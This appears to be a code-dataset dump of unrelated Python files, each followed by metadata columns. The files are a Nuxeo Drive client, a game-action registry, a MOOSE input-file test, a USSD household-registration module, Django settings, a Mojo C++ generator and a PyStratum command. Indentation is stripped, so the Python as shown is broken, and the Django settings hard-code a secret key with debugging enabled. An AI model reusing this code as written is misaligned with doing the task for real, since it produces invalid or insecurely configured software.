def set_property(self, ref, xpath, value):
return self.execute("Document.SetProperty", op_input="doc:" + ref,
xpath=xpath, value=value)
def get_children(self, ref):
return self.execute("Document.GetChildren", op_input="doc:" + ref)
def get_parent(self, ref):
return self.execute("Document.GetParent", op_input="doc:" + ref)
def is_locked(self, ref):
data = self.fetch(ref, extra_headers={'fetch-document': 'lock'})
return 'lockCreated' in data
def lock(self, ref):
return self.execute("Document.Lock", op_input="doc:" + self._check_ref(ref))
def unlock(self, ref):
return self.execute("Document.Unlock", op_input="doc:" + self._check_ref(ref))
def create_user(self, user_name, **kwargs):
return self.execute('User.CreateOrUpdate', username=user_name, **kwargs)
def move(self, ref, target, name=None):
return self.execute("Document.Move",
op_input="doc:" + self._check_ref(ref),
target=self._check_ref(target), name=name)
def copy(self, ref, target, name=None):
return self.execute("Document.Copy",
op_input="doc:" + self._check_ref(ref),
target=self._check_ref(target), name=name)
def create_version(self, ref, increment='None'):
doc = self.execute("Document.CreateVersion",
op_input="doc:" + self._check_ref(ref),
increment=increment)
return doc['uid']
def get_versions(self, ref):
extra_headers = {'X-NXfetch.document': 'versionLabel'}
versions = self.execute(
'Document.GetVersions',
op_input='doc:' + self._check_ref(ref),
extra_headers=extra_headers)
return [(v['uid'], v['versionLabel']) for v in versions['entries']]
def restore_version(self, version):
doc = self.execute("Document.RestoreVersion",
op_input="doc:" + self._check_ref(version))
return doc['uid']
def block_inheritance(self, ref, overwrite=True):
op_input = "doc:" + self._check_ref(ref)
self.execute("Document.SetACE",
op_input=op_input,
user="Administrator",
permission="Everything",
overwrite=overwrite)
self.execute("Document.SetACE",
op_input=op_input,
user="Everyone",
permission="Everything",
grant="false",
overwrite=False)
# These ones are special: no 'op_input' parameter
def fetch(self, ref, **kwargs):
try:
return self.execute("Document.Fetch", value=ref, **kwargs)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotFound("Failed to fetch document %r on server %r" % (
ref, self.server_url))
raise e
def query(self, query, language=None):
return self.execute("Document.Query", query=query, language=language)
# Blob category
def get_blob(self, ref, file_out=None):
if isinstance(ref, NuxeoDocumentInfo):
doc_id = ref.uid
if not ref.has_blob and ref.doc_type == "Note":
doc = self.fetch(doc_id)
content = doc['properties'].get('note:note')
if file_out is not None and content is not None:
with open(file_out, 'wb') as f:
f.write(content.encode('utf-8'))
return content
else:
doc_id = ref
return self.execute("Blob.Get", op_input="doc:" + doc_id,
timeout=self.blob_timeout, file_out=file_out)
def attach_blob(self, ref, blob, filename):
file_path = self.make_tmp_file(blob)
try:
return self.execute_with_blob_streaming(
'Blob.Attach', file_path, filename=filename, document=ref)
finally:
os.remove(file_path)
def delete_blob(self, ref, xpath=None):
return self.execute("Blob.Remove", op_input="doc:" + ref, xpath=xpath)
def log_on_server(self, message, level='WARN'):
""" Log the current test server side. Helpful for debugging. """
return self.execute('Log', message=message, level=level.lower())
#
# Nuxeo Drive specific operations
#
def get_roots(self):
entries = self.execute('NuxeoDrive.GetRoots')['entries']
return self._filtered_results(entries, fetch_parent_uid=False)
def get_update_info(self):
return self.execute('NuxeoDrive.GetClientUpdateInfo')
def register_as_root(self, ref):
self.execute(
'NuxeoDrive.SetSynchronization',
op_input='doc:' + self._check_ref(ref),
enable=True)
return True
def unregister_as_root(self, ref):
self.execute(
'NuxeoDrive.SetSynchronization',
op_input='doc:' + self._check_ref(ref),
enable=False)
return True
| lgpl-2.1 | 4,518,358,538,497,191,000 | 37.606589 | 93 | 0.571809 | false | 4.103193 | false | false | false |
vardis/pano | src/pano/actions/GameActions.py | 1 | 2254 | '''
Copyright (c) 2008 Georgios Giannoudovardis, <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
import logging
from pano.actions import builtinActions
class GameActions:
def __init__(self, game):
self.log = logging.getLogger('pano.actions')
self.game = game
self.actions = { }
builtinActions.registerBultins(self)
def getAction(self, name):
return self.actions[name]
def registerAction(self, action):
self.actions[action.getName()] = action
def unregisterAction(self, name):
del self.actions[name]
def execute(self, name, *params):
self.log.debug('executing action %s' % name)
try:
act = self.actions[name]
if act is not None:
act.execute(self.game, params)
except:
self.log.exception('unexpected error')
def isAction(self, name):
"""
Returns True if the given name corresponds to a known and registered action.
"""
return self.actions.has_key(name)
def builtinNames(self):
return builtinActions.BuiltinActionsNames
| mit | 4,303,235,491,351,281,000 | 33.809524 | 84 | 0.669476 | false | 4.428291 | false | false | false |
nuclear-wizard/moose | python/peacock/tests/input_tab/InputFile/test_InputFile.py | 12 | 2790 | #!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
from peacock.Input.InputFile import InputFile
from peacock.utils import Testing
from peacock import PeacockException
from PyQt5 import QtWidgets
from pyhit import hit
class Tests(Testing.PeacockTester):
qapp = QtWidgets.QApplication([])
def setUp(self):
super(Tests, self).setUp()
self.tmp_file = "tmp_input.i"
self.tmp_bad_file = "tmp_input"
self.basic_input = "[foo]\n[./bar]\ntype = bar\nother = 'bar'[../]\n[./foobar]\nactive = 'bar'\n[../]\n[]\n"
def tearDown(self):
Testing.remove_file(self.tmp_file)
Testing.remove_file(self.tmp_bad_file)
def writeFile(self, s, fname):
with open(fname, "w") as f:
f.write(s)
def testFailures(self):
input_file = InputFile()
with self.assertRaises(PeacockException.PeacockException):
input_file.openInputFile("/no_exist")
with self.assertRaises(PeacockException.PeacockException):
input_file.openInputFile("/")
with self.assertRaises(PeacockException.PeacockException):
self.writeFile(self.basic_input, self.tmp_bad_file)
input_file.openInputFile(self.tmp_bad_file)
with self.assertRaises(PeacockException.PeacockException):
# simulate a duplicate section in the input file
# which should throw an exception
self.writeFile(self.basic_input*2, self.tmp_file)
input_file.openInputFile(self.tmp_file)
def testSuccess(self):
self.writeFile(self.basic_input, self.tmp_file)
input_file = InputFile(self.tmp_file)
self.assertNotEqual(input_file.root_node, None)
self.assertEqual(input_file.changed, False)
children = [ c for c in input_file.root_node.children(node_type=hit.NodeType.Section) ]
self.assertEqual(len(children), 1)
top = children[0]
self.assertEqual(top.path(), "foo")
children = [ c for c in top.children(node_type=hit.NodeType.Section) ]
self.assertEqual(len(children), 2)
c0 = children[0]
self.assertEqual(c0.path(), "bar")
params = [ c for c in c0.children(node_type=hit.NodeType.Field) ]
self.assertEqual(len(params), 2)
c1 = children[1]
self.assertEqual(c1.path(), "foobar")
params = [ c for c in c1.children(node_type=hit.NodeType.Field) ]
self.assertEqual(len(params), 1)
if __name__ == '__main__':
Testing.run_tests()
| lgpl-2.1 | -5,546,552,538,365,725,000 | 38.295775 | 116 | 0.651254 | false | 3.414933 | true | false | false |
unicefuganda/mics | survey/ussd/ussd_register_household.py | 1 | 11204 | from calendar import monthrange
import datetime
from django.core.exceptions import ObjectDoesNotExist
from survey.models import Question, HouseholdHead, UnknownDOBAttribute
from survey.models.households import HouseholdMember
from survey.ussd.ussd import USSD
class USSDRegisterHousehold(USSD):
HEAD_ANSWER = {
'HEAD': '1',
'MEMBER': '2'
}
REGISTRATION_DICT = {}
UNKNOWN = 99
def __init__(self, investigator, request):
super(USSDRegisterHousehold, self).__init__(investigator, request)
self.question = None
self.household_member = None
self.is_head = None
self.is_selecting_member = False
self.set_question()
self.set_form_in_cache()
self.set_household_member()
self.set_head_in_cache()
self.set_is_selecting_member()
def set_question(self):
try:
question = self.get_from_session('QUESTION')
if question:
self.question = question
except KeyError:
pass
def set_form_in_cache(self):
try:
if not self.investigator.get_from_cache('registration_dict'):
self.investigator.set_in_cache('registration_dict', self.REGISTRATION_DICT)
else:
self.REGISTRATION_DICT = self.investigator.get_from_cache('registration_dict')
except KeyError:
pass
def set_head_in_cache(self):
try:
is_head = self.investigator.get_from_cache('is_head')
if is_head is not None:
self.is_head = is_head
except KeyError:
pass
def set_is_selecting_member(self):
try:
is_selecting_member = self.investigator.get_from_cache('is_selecting_member')
if is_selecting_member is not None:
self.is_selecting_member = is_selecting_member
except KeyError:
self.investigator.set_in_cache('is_selecting_member', False)
def set_head(self, answer):
if self.is_head is None or not self.is_head:
if answer == self.HEAD_ANSWER['HEAD']:
self.investigator.set_in_cache('is_head', True)
else:
self.investigator.set_in_cache('is_head', False)
self.is_head = self.investigator.get_from_cache('is_head')
self.investigator.set_in_cache('is_selecting_member', False)
def start(self, answer):
self.register_households(answer)
self.set_in_session('QUESTION', self.question)
return self.action, self.responseString
def render_questions_based_on_head_selection(self, answer):
if self.household.get_head():
self.render_questions_or_member_selection(answer)
else:
self.render_select_member_or_head()
def validate_house_selection(self):
if self.is_invalid_response():
self.get_household_list()
else:
self.investigator.set_in_cache('HOUSEHOLD', self.household)
def register_households(self, answer):
if not self.household and self.is_browsing_households_list(answer):
self.get_household_list()
elif self.household:
if self.is_selecting_member:
self.set_head(answer)
response = self.render_registration_options(answer)
if not response is None:
self.responseString += response
else:
if not self.is_resuming_survey:
self.select_household(answer)
self.validate_house_selection()
else:
self.household = self.investigator.get_from_cache('HOUSEHOLD')
if self.household:
self.render_questions_based_on_head_selection(answer)
def render_select_member_or_head(self):
self.investigator.set_in_cache('is_selecting_member', True)
self.responseString = self.MESSAGES['SELECT_HEAD_OR_MEMBER'] % str(self.household.random_sample_number)
def render_questions_or_member_selection(self, answer):
if self.household.get_head():
self.investigator.set_in_cache('is_head', False)
self.responseString = USSD.MESSAGES['HEAD_REGISTERED']
self.responseString += self.render_questions(answer)
else:
self.render_select_member_or_head()
def render_questions(self, answer):
all_questions = Question.objects.filter(group__name="REGISTRATION GROUP").order_by('order')
if not self.question:
self.investigator.set_in_cache('INVALID_ANSWER', [])
self.question = all_questions[0]
else:
self.question = self.process_registration_answer(answer)
page = self.get_from_session('PAGE')
self.add_question_prefix()
return self.question.to_ussd(page) if self.question else None
def render_registration_options(self, answer):
if self.household_member:
if answer == self.ANSWER['YES']:
self.household = self.investigator.get_from_cache('HOUSEHOLD')
self.render_questions_or_member_selection(answer)
if answer == self.ANSWER['NO']:
self.investigator.clear_interview_caches()
self.set_in_session('HOUSEHOLD', None)
self.responseString = self.render_menu()
self.set_in_session('HOUSEHOLD_MEMBER', None)
else:
return self.render_questions(answer)
def process_registration_answer(self, answer):
answer = int(answer) if answer.isdigit() else answer
if not answer and answer != 0:
self.investigator.invalid_answer(self.question)
return self.question
if self.question.is_multichoice() and self.is_pagination_option(answer):
self.set_current_page(answer)
self.investigator.remove_ussd_variable('INVALID_ANSWER', self.question)
return self.question
age_question = Question.objects.get(text__startswith="Please Enter the age")
if self.is_year_question_answered() and not self.age_validates(answer):
self.investigator.invalid_answer(age_question)
return age_question
return self.get_next_question(answer)
def get_next_question(self, answer):
try:
next_question = self.next_question_by_rule(answer)
except ObjectDoesNotExist, e:
self.save_in_registration_dict(answer)
next_question = self.next_question_by_order()
self.save_in_registration_dict(answer)
return next_question
def next_question_by_rule(self, answer):
answer_class = self.question.answer_class()
if self.question.is_multichoice():
answer = self.question.get_option(answer, self.investigator)
if not answer:
return self.question
_answer = answer_class(answer=answer)
next_question = self.question.get_next_question_by_rule(_answer, self.investigator)
if next_question != self.question:
next_question.order = self.question.order
return next_question
def next_question_by_order(self):
next_questions = Question.objects.filter(group__name="REGISTRATION GROUP",
order__gte=self.question.order + 1).order_by('order')
if not next_questions:
self.save_member_and_clear_cache()
return None
return next_questions[0]
def save_in_registration_dict(self, answer):
self.REGISTRATION_DICT[self.question.text] = answer
self.investigator.set_in_cache('registration_dict', self.REGISTRATION_DICT)
def save_member_and_clear_cache(self):
self.save_member_object()
self.investigator.clear_all_cache_fields_except('IS_REGISTERING_HOUSEHOLD')
self.investigator.set_in_cache('HOUSEHOLD', self.household)
self.responseString = USSD.MESSAGES['END_REGISTRATION']
def process_member_attributes(self):
member_dict = {}
name_question = Question.objects.get(text__startswith="Please Enter the name")
age_question = Question.objects.get(text__startswith="Please Enter the age")
gender_question = Question.objects.get(text__startswith="Please Enter the gender")
month_of_birth_question = Question.objects.get(text__startswith="Please Enter the month of birth")
month_of_birth = self.REGISTRATION_DICT[month_of_birth_question.text]
member_dict['surname'] = self.REGISTRATION_DICT[name_question.text]
member_dict['male'] = self.format_gender_response(gender_question)
member_dict['date_of_birth'] = self.format_age_to_date_of_birth(age_question, month_of_birth)
year_of_birth_question = Question.objects.get(text__startswith="Please Enter the year of birth")
year_of_birth = self.REGISTRATION_DICT[year_of_birth_question.text]
attributes = {'MONTH': month_of_birth,
'YEAR': year_of_birth}
return member_dict, attributes
def save_member_object(self):
member_dict, unknown_attributes = self.process_member_attributes()
member = self.save_member(member_dict)
self.save_unknown_dob_attributes(member, unknown_attributes)
self.set_in_session('HOUSEHOLD_MEMBER', member)
def save_unknown_dob_attributes(self, member, unknown_attributes):
for type_, attribute in unknown_attributes.items():
self.save_attribute(type_, attribute, member)
def save_attribute(self, type_, attribute, member):
if attribute == self.UNKNOWN:
UnknownDOBAttribute.objects.create(household_member=member, type=type_)
def save_member(self, member_dict):
object_to_create = HouseholdHead if self.is_head else HouseholdMember
return object_to_create.objects.create(surname=member_dict['surname'], male=member_dict['male'],
date_of_birth=str(member_dict['date_of_birth']), household=self.household)
def format_age_to_date_of_birth(self, age_question, month_of_birth):
age = self.REGISTRATION_DICT[age_question.text]
today = datetime.date.today()
date_of_birth = today.replace(year=(today.year - int(age)))
if month_of_birth != self.UNKNOWN:
year = date_of_birth.year
month = int(month_of_birth)
day = min(today.day, monthrange(year, month)[1])
date_of_birth = datetime.date(year=year, month=month, day=day)
return date_of_birth
def format_gender_response(self, question):
return self.REGISTRATION_DICT[question.text] == 1
def is_year_question_answered(self):
return "year of birth" in self.question.text
def age_validates(self, answer):
if answer != self.UNKNOWN:
age_question = Question.objects.get(text__startswith="Please Enter the age")
given_age = self.REGISTRATION_DICT[age_question.text]
inferred_year_of_birth = datetime.date.today().year - int(given_age)
return inferred_year_of_birth == int(answer)
return True | bsd-3-clause | -4,769,370,553,601,594,000 | 41.283019 | 121 | 0.632453 | false | 3.855471 | false | false | false |
dgeorgievd/ovirtctl | api/api/settings.py | 1 | 3179 | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=pe$t0a2dgf%ghj(b$suu2=4vi0x^uq6=l82qn1fx=fe52uym5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| apache-2.0 | -3,422,961,035,196,886,500 | 25.057377 | 91 | 0.68921 | false | 3.520487 | false | false | false |
GladeRom/android_external_chromium_org | mojo/public/tools/bindings/generators/mojom_cpp_generator.py | 25 | 12218 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates C++ source files from a mojom.Module."""
import mojom.generate.generator as generator
import mojom.generate.module as mojom
import mojom.generate.pack as pack
from mojom.generate.template_expander import UseJinja
_kind_to_cpp_type = {
mojom.BOOL: "bool",
mojom.INT8: "int8_t",
mojom.UINT8: "uint8_t",
mojom.INT16: "int16_t",
mojom.UINT16: "uint16_t",
mojom.INT32: "int32_t",
mojom.UINT32: "uint32_t",
mojom.FLOAT: "float",
mojom.HANDLE: "mojo::Handle",
mojom.DCPIPE: "mojo::DataPipeConsumerHandle",
mojom.DPPIPE: "mojo::DataPipeProducerHandle",
mojom.MSGPIPE: "mojo::MessagePipeHandle",
mojom.SHAREDBUFFER: "mojo::SharedBufferHandle",
mojom.NULLABLE_HANDLE: "mojo::Handle",
mojom.NULLABLE_DCPIPE: "mojo::DataPipeConsumerHandle",
mojom.NULLABLE_DPPIPE: "mojo::DataPipeProducerHandle",
mojom.NULLABLE_MSGPIPE: "mojo::MessagePipeHandle",
mojom.NULLABLE_SHAREDBUFFER: "mojo::SharedBufferHandle",
mojom.INT64: "int64_t",
mojom.UINT64: "uint64_t",
mojom.DOUBLE: "double",
}
_kind_to_cpp_literal_suffix = {
mojom.UINT8: "U",
mojom.UINT16: "U",
mojom.UINT32: "U",
mojom.FLOAT: "f",
mojom.UINT64: "ULL",
}
def ConstantValue(constant):
return ExpressionToText(constant.value, kind=constant.kind)
def DefaultValue(field):
if field.default:
if mojom.IsStructKind(field.kind):
assert field.default == "default"
return "%s::New()" % GetNameForKind(field.kind)
return ExpressionToText(field.default, kind=field.kind)
return ""
def NamespaceToArray(namespace):
return namespace.split('.') if namespace else []
def GetNameForKind(kind, internal = False):
parts = []
if kind.imported_from:
parts.extend(NamespaceToArray(kind.imported_from["namespace"]))
if internal:
parts.append("internal")
if kind.parent_kind:
parts.append(kind.parent_kind.name)
parts.append(kind.name)
return "::".join(parts)
def GetCppType(kind):
if mojom.IsStructKind(kind):
return "%s_Data*" % GetNameForKind(kind, internal=True)
if mojom.IsAnyArrayKind(kind):
return "mojo::internal::Array_Data<%s>*" % GetCppType(kind.kind)
if mojom.IsInterfaceKind(kind) or mojom.IsInterfaceRequestKind(kind):
return "mojo::MessagePipeHandle"
if mojom.IsEnumKind(kind):
return "int32_t"
if mojom.IsStringKind(kind):
return "mojo::internal::String_Data*"
return _kind_to_cpp_type[kind]
def GetCppPodType(kind):
if mojom.IsStringKind(kind):
return "char*"
return _kind_to_cpp_type[kind]
def GetCppArrayArgWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s> " % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
raise Exception("Arrays of interfaces not yet supported!")
if mojom.IsInterfaceRequestKind(kind):
raise Exception("Arrays of interface requests not yet supported!")
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppResultWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
return "mojo::InterfaceRequest<%s>" % GetNameForKind(kind.kind)
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppWrapperType(kind):
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
raise Exception("InterfaceRequest fields not supported!")
if mojom.IsStringKind(kind):
return "mojo::String"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
return _kind_to_cpp_type[kind]
def GetCppConstWrapperType(kind):
if mojom.IsStructKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsAnyArrayKind(kind):
return "mojo::Array<%s>" % GetCppArrayArgWrapperType(kind.kind)
if mojom.IsInterfaceKind(kind):
return "%sPtr" % GetNameForKind(kind)
if mojom.IsInterfaceRequestKind(kind):
return "mojo::InterfaceRequest<%s>" % GetNameForKind(kind.kind)
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStringKind(kind):
return "const mojo::String&"
if mojom.IsHandleKind(kind):
return "mojo::ScopedHandle"
if mojom.IsDataPipeConsumerKind(kind):
return "mojo::ScopedDataPipeConsumerHandle"
if mojom.IsDataPipeProducerKind(kind):
return "mojo::ScopedDataPipeProducerHandle"
if mojom.IsMessagePipeKind(kind):
return "mojo::ScopedMessagePipeHandle"
if mojom.IsSharedBufferKind(kind):
return "mojo::ScopedSharedBufferHandle"
if not kind in _kind_to_cpp_type:
print "missing:", kind.spec
return _kind_to_cpp_type[kind]
def GetCppFieldType(kind):
if mojom.IsStructKind(kind):
return ("mojo::internal::StructPointer<%s_Data>" %
GetNameForKind(kind, internal=True))
if mojom.IsAnyArrayKind(kind):
return "mojo::internal::ArrayPointer<%s>" % GetCppType(kind.kind)
if mojom.IsInterfaceKind(kind) or mojom.IsInterfaceRequestKind(kind):
return "mojo::MessagePipeHandle"
if mojom.IsEnumKind(kind):
return GetNameForKind(kind)
if mojom.IsStringKind(kind):
return "mojo::internal::StringPointer"
return _kind_to_cpp_type[kind]
def IsStructWithHandles(struct):
for pf in struct.packed.packed_fields:
if mojom.IsAnyHandleKind(pf.field.kind):
return True
return False
def TranslateConstants(token, kind):
if isinstance(token, mojom.NamedValue):
# Both variable and enum constants are constructed like:
# Namespace::Struct::CONSTANT_NAME
# For enums, CONSTANT_NAME is ENUM_NAME_ENUM_VALUE.
name = []
if token.imported_from:
name.extend(NamespaceToArray(token.namespace))
if token.parent_kind:
name.append(token.parent_kind.name)
if isinstance(token, mojom.EnumValue):
name.append(
"%s_%s" % (generator.CamelCaseToAllCaps(token.enum.name), token.name))
else:
name.append(token.name)
return "::".join(name)
if isinstance(token, mojom.BuiltinValue):
if token.value == "double.INFINITY" or token.value == "float.INFINITY":
return "INFINITY";
if token.value == "double.NEGATIVE_INFINITY" or \
token.value == "float.NEGATIVE_INFINITY":
return "-INFINITY";
if token.value == "double.NAN" or token.value == "float.NAN":
return "NAN";
if (kind is not None and mojom.IsFloatKind(kind)):
return token if token.isdigit() else token + "f";
return '%s%s' % (token, _kind_to_cpp_literal_suffix.get(kind, ''))
def ExpressionToText(value, kind=None):
return TranslateConstants(value, kind)
def ShouldInlineStruct(struct):
# TODO(darin): Base this on the size of the wrapper class.
if len(struct.fields) > 4:
return False
for field in struct.fields:
if mojom.IsMoveOnlyKind(field.kind):
return False
return True
def GetArrayValidateParams(kind):
if not mojom.IsAnyArrayKind(kind) and not mojom.IsStringKind(kind):
return "mojo::internal::NoValidateParams"
if mojom.IsStringKind(kind):
expected_num_elements = 0
element_is_nullable = False
element_validate_params = "mojo::internal::NoValidateParams"
else:
expected_num_elements = generator.ExpectedArraySize(kind)
element_is_nullable = mojom.IsNullableKind(kind.kind)
element_validate_params = GetArrayValidateParams(kind.kind)
return "mojo::internal::ArrayValidateParams<%d, %s,\n%s> " % (
expected_num_elements,
'true' if element_is_nullable else 'false',
element_validate_params)
_HEADER_SIZE = 8
class Generator(generator.Generator):
cpp_filters = {
"constant_value": ConstantValue,
"cpp_const_wrapper_type": GetCppConstWrapperType,
"cpp_field_type": GetCppFieldType,
"cpp_pod_type": GetCppPodType,
"cpp_result_type": GetCppResultWrapperType,
"cpp_type": GetCppType,
"cpp_wrapper_type": GetCppWrapperType,
"default_value": DefaultValue,
"expected_array_size": generator.ExpectedArraySize,
"expression_to_text": ExpressionToText,
"get_array_validate_params": GetArrayValidateParams,
"get_name_for_kind": GetNameForKind,
"get_pad": pack.GetPad,
"has_callbacks": mojom.HasCallbacks,
"should_inline": ShouldInlineStruct,
"is_any_array_kind": mojom.IsAnyArrayKind,
"is_enum_kind": mojom.IsEnumKind,
"is_move_only_kind": mojom.IsMoveOnlyKind,
"is_any_handle_kind": mojom.IsAnyHandleKind,
"is_interface_kind": mojom.IsInterfaceKind,
"is_interface_request_kind": mojom.IsInterfaceRequestKind,
"is_nullable_kind": mojom.IsNullableKind,
"is_object_kind": mojom.IsObjectKind,
"is_string_kind": mojom.IsStringKind,
"is_struct_with_handles": IsStructWithHandles,
"struct_size": lambda ps: ps.GetTotalSize() + _HEADER_SIZE,
"struct_from_method": generator.GetStructFromMethod,
"response_struct_from_method": generator.GetResponseStructFromMethod,
"stylize_method": generator.StudlyCapsToCamel,
"to_all_caps": generator.CamelCaseToAllCaps,
}
def GetJinjaExports(self):
return {
"module": self.module,
"namespace": self.module.namespace,
"namespaces_as_array": NamespaceToArray(self.module.namespace),
"imports": self.module.imports,
"kinds": self.module.kinds,
"enums": self.module.enums,
"structs": self.GetStructs(),
"interfaces": self.module.interfaces,
}
@UseJinja("cpp_templates/module.h.tmpl", filters=cpp_filters)
def GenerateModuleHeader(self):
return self.GetJinjaExports()
@UseJinja("cpp_templates/module-internal.h.tmpl", filters=cpp_filters)
def GenerateModuleInternalHeader(self):
return self.GetJinjaExports()
@UseJinja("cpp_templates/module.cc.tmpl", filters=cpp_filters)
def GenerateModuleSource(self):
return self.GetJinjaExports()
def GenerateFiles(self, args):
self.Write(self.GenerateModuleHeader(), "%s.h" % self.module.name)
self.Write(self.GenerateModuleInternalHeader(),
"%s-internal.h" % self.module.name)
self.Write(self.GenerateModuleSource(), "%s.cc" % self.module.name)
| bsd-3-clause | -2,157,970,695,015,137,000 | 35.363095 | 80 | 0.704207 | false | 3.287944 | false | false | false |
SetBased/py-stratum | pystratum/command/PyStratumCommand.py | 1 | 1572 | """
PyStratum
"""
from cleo import Command, Input, Output
from pystratum.style.PyStratumStyle import PyStratumStyle
class PyStratumCommand(Command):
"""
Loads stored routines and generates a wrapper class
stratum
{config_file : The stratum configuration file}
{file_names?* : Sources with stored routines}
"""
# ------------------------------------------------------------------------------------------------------------------
def execute(self, input_object: Input, output_object: Output) -> int:
"""
Executes this command.
"""
self.input = input_object
self.output = output_object
return self.handle()
